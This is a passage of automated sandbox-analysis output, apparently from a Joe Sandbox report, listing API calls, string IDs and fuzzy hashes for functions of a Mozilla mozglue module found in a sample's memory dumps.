                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                      • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                      • API String ID: 1281939033-809102171
                                                                                                      • Opcode ID: 924bdc62ff1d645c5af641e1015620198eb6b552ae70ed94a32d6c9daf5c9c63
                                                                                                      • Instruction ID: a00764e9b745ba7a5d66bec12e101b345b368d50a9f263ca15cfc896fa73033a
                                                                                                      • Opcode Fuzzy Hash: 924bdc62ff1d645c5af641e1015620198eb6b552ae70ed94a32d6c9daf5c9c63
                                                                                                      • Instruction Fuzzy Hash: C74128326012119BEB109FE4DC057AE7BB9FB8630DF090019E92997B41CB31A905CBF3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFED4F0
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFED4FC
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFED52A
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFED530
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFED53F
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFED55F
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFED585
                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CFED5D3
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFED5F9
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFED605
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFED652
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFED658
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFED667
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFED6A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2206442479-0
                                                                                                      • Opcode ID: d191b9dc6edf6eda80977fc381be1f83a2c7ed5251aacf3de75ba0c34d9c5870
                                                                                                      • Instruction ID: a16fdc9a62dd494492567cf6cba791750ff7d47bb853a56c0d6f54ee7699486c
                                                                                                      • Opcode Fuzzy Hash: d191b9dc6edf6eda80977fc381be1f83a2c7ed5251aacf3de75ba0c34d9c5870
                                                                                                      • Instruction Fuzzy Hash: AC517D75504705EFC704CF65C884A9ABBF4FF8A318F108A2EE85A87711DB30E945CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CFB56D1
                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CFB56E9
                                                                                                      • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CFB56F1
                                                                                                      • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CFB5744
                                                                                                      • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CFB57BC
                                                                                                      • GetTickCount64.KERNEL32 ref: 6CFB58CB
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F688), ref: 6CFB58F3
                                                                                                      • __aulldiv.LIBCMT ref: 6CFB5945
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F688), ref: 6CFB59B2
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6D01F638,?,?,?,?), ref: 6CFB59E9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                      • String ID: MOZ_APP_RESTART
                                                                                                      • API String ID: 2752551254-2657566371
                                                                                                      • Opcode ID: dd103494481fc78685a0b5fcdc3346207a7d11323583074e1fd64f1391135712
                                                                                                      • Instruction ID: 8b8ecfc8cf253165d567eefd760068911dcb0b523577a09074f75d897bd28175
                                                                                                      • Opcode Fuzzy Hash: dd103494481fc78685a0b5fcdc3346207a7d11323583074e1fd64f1391135712
                                                                                                      • Instruction Fuzzy Hash: 61C1AC729083409FDB05CF68C84176ABBF5FFCA714F058A1DE8D8A7661D734A885CB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEC84
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDEC8C
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDECA1
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDECAE
                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CFDECC5
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDED0A
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CFDED19
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6CFDED28
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFDED2F
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDED59
                                                                                                      Strings
                                                                                                      • [I %d/%d] profiler_ensure_started, xrefs: 6CFDEC94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                      • String ID: [I %d/%d] profiler_ensure_started
                                                                                                      • API String ID: 4057186437-125001283
                                                                                                      • Opcode ID: a722da199dffa392898a15919966c1f1040942c584843f10e598a86d4f04cc38
                                                                                                      • Instruction ID: eb871feb8f980f77029fcf15222cf3424bcbea879fe1ab8a121a44bc4f8bf8e0
                                                                                                      • Opcode Fuzzy Hash: a722da199dffa392898a15919966c1f1040942c584843f10e598a86d4f04cc38
                                                                                                      • Instruction Fuzzy Hash: 8321E572400114AFEB009FE4DC05BAABB79FB4726CF194214FC2897741DB31A805CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CF9EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF9EB83
                                                                                                      • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CFDB392,?,?,00000001), ref: 6CFD91F4
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                      • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                      • API String ID: 3790164461-3347204862
                                                                                                      • Opcode ID: 34359ad02957c1e0b382cb08ba7ff7fe852eefd5ae60e904ef62ab403aa626de
                                                                                                      • Instruction ID: 58ce0b2ba02baf397f0f2f43d102a89918c3d44bf1f6e633525eeaf2c8f249d9
                                                                                                      • Opcode Fuzzy Hash: 34359ad02957c1e0b382cb08ba7ff7fe852eefd5ae60e904ef62ab403aa626de
                                                                                                      • Instruction Fuzzy Hash: F7B1D5B0A01209DBEF04CFD4C8557EEBBB5BF85318F154019D406ABB84DB31AA45CBE2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CFBC5A3
                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6CFBC9EA
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CFBC9FB
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CFBCA12
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFBCA2E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFBCAA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                      • String ID: (null)$0
                                                                                                      • API String ID: 4074790623-38302674
                                                                                                      • Opcode ID: 6ebbd1a1a70ef19df62a7ba4366170af2fcdd8c55318421366711d3891033363
                                                                                                      • Instruction ID: 18f86304fe5436f3da7f1db2cb132609a598d2290706cd10e894347acb60ab4c
                                                                                                      • Opcode Fuzzy Hash: 6ebbd1a1a70ef19df62a7ba4366170af2fcdd8c55318421366711d3891033363
                                                                                                      • Instruction Fuzzy Hash: C4A1AE316093429FDB00DF2AC994B5FBBF5AF89748F18882DE899E7641D731D805CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF93492
                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF934A9
                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF934EF
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CF9350E
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CF93522
                                                                                                      • __aulldiv.LIBCMT ref: 6CF93552
                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF9357C
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CF93592
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                      • API String ID: 3634367004-706389432

                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: free$moz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3009372454-0

                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                      • String ID:
                                                                                                      • API String ID: 1192971331-0

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CFA9675
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA9697
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CFA96E8
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CFA9707
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA971F
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CFA9773
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CFA97B7
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA97D0
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA97EB
                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CFA9824
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                      • API String ID: 409848716-3880535382

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E784), ref: 6CF91EC1
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF91EE1
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E744), ref: 6CF91F38
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E744), ref: 6CF91F5C
                                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CF91F83
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF91FC0
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E784), ref: 6CF91FE2
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF91FF6
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF92019
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                      • String ID: MOZ_CRASH()
                                                                                                      • API String ID: 2055633661-2608361144

                                                                                                      APIs
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFA7EA7
                                                                                                      • malloc.MOZGLUE(00000001), ref: 6CFA7EB3
                                                                                                        • Part of subcall function 6CFACAB0: EnterCriticalSection.KERNEL32(?), ref: 6CFACB49
                                                                                                        • Part of subcall function 6CFACAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CFACBB6
                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CFA7EC4
                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6CFA7F19
                                                                                                      • malloc.MOZGLUE(?), ref: 6CFA7F36
                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFA7F4D
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                      • String ID: d
                                                                                                      • API String ID: 204725295-2564639436

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL ref: 6CFA3EEE
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CFA3FDC
                                                                                                      • RtlAllocateHeap.NTDLL ref: 6CFA4006
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CFA40A1
                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CFA3CCC), ref: 6CFA40AF
                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CFA3CCC), ref: 6CFA40C2
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CFA4134
                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CFA3CCC), ref: 6CFA4143
                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CFA3CCC), ref: 6CFA4157
                                                                                                      Similarity
                                                                                                      • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                      • String ID:
                                                                                                      • API String ID: 3680524765-0

                                                                                                      APIs
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFE8273), ref: 6CFE9D65
                                                                                                      • free.MOZGLUE(6CFE8273,?), ref: 6CFE9D7C
                                                                                                      • free.MOZGLUE(?,?), ref: 6CFE9D92
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CFE9E0F
                                                                                                      • free.MOZGLUE(6CFE946B,?,?), ref: 6CFE9E24
                                                                                                      • free.MOZGLUE(?,?,?), ref: 6CFE9E3A
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CFE9EC8
                                                                                                      • free.MOZGLUE(6CFE946B,?,?,?), ref: 6CFE9EDF
                                                                                                      • free.MOZGLUE(?,?,?,?), ref: 6CFE9EF5
                                                                                                      Similarity
                                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                      • String ID:
                                                                                                      • API String ID: 956590011-0

                                                                                                      APIs
                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CFEDDCF
                                                                                                        • Part of subcall function 6CFCFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFCFA4B
                                                                                                        • Part of subcall function 6CFE90E0: free.MOZGLUE(?,00000000,?,?,6CFEDEDB), ref: 6CFE90FF
                                                                                                        • Part of subcall function 6CFE90E0: free.MOZGLUE(?,00000000,?,?,6CFEDEDB), ref: 6CFE9108
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFEDE0D
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFEDE41
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFEDE5F
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFEDEA3
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFEDEE9
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CFDDEFD,?,6CFA4A68), ref: 6CFEDF32
                                                                                                        • Part of subcall function 6CFEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CFEDB86
                                                                                                        • Part of subcall function 6CFEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CFEDC0E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CFDDEFD,?,6CFA4A68), ref: 6CFEDF65
                                                                                                      • free.MOZGLUE(?), ref: 6CFEDF80
                                                                                                        • Part of subcall function 6CFB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                        • Part of subcall function 6CFB5E90: memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                        • Part of subcall function 6CFB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 112305417-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5D32
                                                                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5D62
                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5D6D
                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5D84
                                                                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5DA4
                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5DC9
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6CFF5DDB
                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5E00
                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CFF5C8C,?,6CFCE829), ref: 6CFF5E45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 2325513730-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CF931A7), ref: 6CFCCDDD
                                                                                                      Strings
                                                                                                      Memory Dump Source
